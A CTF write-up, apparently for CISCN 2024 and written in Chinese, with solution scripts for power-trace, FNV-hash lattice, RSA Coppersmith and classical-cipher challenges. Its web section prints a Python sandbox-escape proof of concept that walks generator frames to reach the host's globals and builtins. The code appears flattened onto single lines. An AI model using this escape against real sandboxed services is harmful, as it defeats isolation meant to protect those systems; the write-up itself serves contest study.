Misc

Power Trajectory Diagram

得到npz文件,打开后取范数排序。

import numpy as np npz_file = np.load("attachment.npz") index = npz_file['index'] input = npz_file['input'] output = npz_file['output'] trace = npz_file['trace'] norms = {} for i in range(520): if norms.get(index[i]) is None: norms[index[i]] = [] norms[index[i]].append((np.linalg.norm(trace[i]),input[i])) for key in norms: norm = sorted(norms[key],key=lambda x: x[0])[::-1] print(norm[0][1],end="")

得到 ziscn_2034,然后补全爆破即可得到flag。flag{_ciscn_2024}

通风机

搜索mwp文件找到STEP7Micro/WIN。

格式不兼容,在文件头补全GJK即可。

然后得到单层base64的flag。

火锅链观光打卡

直接答题就行

Crypto

hash

python2.7使用fnv算法。https://en.wikipedia.org/wiki/Fowler%E2%80%93Noll%E2%80%93Vo_hash_function,参考https://ctf-wiki.org/crypto/hash/fnv/,将异或替换成加法格基规约,最小规约即为解,于是可以计算key,从而得到flag。

a = 1000003 al = [] for i in range(8): al.append(a^i) wl = [] for i in range(6): wl.append(al[i]) wl.append(2^7*al[7] + al[6]) m = matrix(ZZ,9,9) x = 7457312583301101235 length = 7 mask = 0xffffffffffffffff x = x ^^ length & mask print(x) wl.append(-x) for i in range(8): m[i,0] = wl[i]*2**20 m[i,i+1] = 1 m[-2,-1] = 2^ 8 m[-1,0] = 2^64*2**20 for v in m.LLL(): cr = [] if abs(v[-1]) == 256: c = v[1:-1] * sgn(v[-1]) xx = x for ci in c: xx_ = (xx - ci)*inverse_mod(a,2**64)%2**64 cr.append(xx^^(xx_*a)%2**64) xx = xx_ print(cr) s = sum(a**i*c[i] for i in range(7)) + a ** 7 * 2 ** 7 * c[-1] s %= 2**64 assert s == x break msg = 13903983817893117249931704406959869971132956255130487015289848690577655239262013033618370827749581909492660806312017 key = bytes(ci for ci in cr[::-1]) import hashlib print(bytes.fromhex(hex(msg^int(hashlib.sha384(binascii.hexlify(key)).hexdigest(), 16))[2:]))

古典密码

Atbash加密+base64decode+fence。

OvO

p,q接近且相差不大可以视作一个数。可以解方程得到p,q近似值。

然后利用p近似值可以通过coppersmith攻击得到p,q。

import sympy n = 111922722351752356094117957341697336848130397712588425954225300832977768690114834703654895285440684751636198779555891692340301590396539921700125219784729325979197290342352480495970455903120265334661588516182848933843212275742914269686197484648288073599387074325226321407600351615258973610780463417788580083967 e = 37059679294843322451875129178470872595128216054082068877693632035071251762179299783152435312052608685562859680569924924133175684413544051218945466380415013172416093939670064185752780945383069447693745538721548393982857225386614608359109463927663728739248286686902750649766277564516226052064304547032760477638585302695605907950461140971727150383104 c = 14999622534973796113769052025256345914577762432817016713135991450161695032250733213228587506601968633155119211807176051329626895125610484405486794783282214597165875393081405999090879096563311452831794796859427268724737377560053552626220191435015101496941337770496898383092414492348672126813183368337602023823 rr = e // n kk = rr - 2 x = sympy.symbols('x') f = (kk+rr) * x ** 2 + (rr * n + rr + 65537 + 1 - e) * x + rr * n p_ = int(sympy.solve(f)[1]) P.<x> = PolynomialRing(Zmod(n)) f = x + p_ x0 = f.small_roots(X=2^75,beta=0.4)[0] p = int(p_ + x0) assert n % p == 0 q = n // int(p) phi = (p-1)*(q-1) e = 65537 + kk * p + rr * ((p+1) * (q+1)) + 1 d = pow(e,-1,phi) m = pow(c,d,n) print(bytes.fromhex(hex(m)[2:]))

Web

mossfern

看源代码发现是沙箱逃逸。尝试发现是栈帧沙箱逃逸

https://xz.aliyun.com/t/13635

参考上文内容构造poc可以得到

def waff(): def f(): yield generator.gi_frame.f_back generator = f() frame = [x for x in generator][0] str = frame.f_back.f_back.f_back.f_globals['_'*2+"builtins"+'_'*2].str for i in str(frame.f_back.f_back.f_back.f_code.co_consts): print(i) waff()